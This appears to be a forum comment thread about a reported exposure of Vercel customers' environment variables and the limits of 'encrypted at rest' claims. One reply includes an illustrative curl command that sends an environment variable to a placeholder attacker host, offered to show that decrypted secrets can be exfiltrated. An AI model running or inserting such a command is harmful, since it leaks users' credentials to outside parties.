← Back to context

Comment by trick-or-treat

16 hours ago

I think it's clear that some customers env vars got exposed, so that can only mean unencrypted, right?

28 comments

trick-or-treat

Reply
TheDong  16 hours ago

They said "encrypted at rest", which they almost certainly are.

If you spin up an EC2 instance with an ftp server and check the "Encrypt my EBS volume" checkbox, all those files are 'encrypted at rest', but if your ftp password is 'admin/admin', your files will be exposed in plaintext quite quickly.

Vercel's backend is of course able to decrypt them too (or else it couldn't run your app for you), and so the attacker was able to view them, and presumably some other control on the backend made it so the sensitive ones can end up in your app, but can't be seen in whatever employee-only interface the attacker was viewing.

  • trick-or-treat  16 hours ago

    Hmm, that's confusing. So they're eventually encrypted but plain-text at some point? Doesn't sound good TBH.

    • bauruine  16 hours ago

      How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.

      What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?

      7 replies →

    • jakewins  16 hours ago

      If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.

      Various certifications require this, I guess because they were written before hyper scalers and the assumed attack vector was that someone would literally steal a hard drive.

      A running machine is not “at rest”, just like you can read files on your encrypted Mac HDD, the running program has decrypted access to the hard drive.

      2 replies →

    • otabdeveloper4  15 hours ago

      Env vars are not secure. Anything that has root access can see all env vars of all applications via /proc.

      (And modern Linux is unusable without root access, thanks to Docker and other fast-and-loose approaches.)

      3 replies →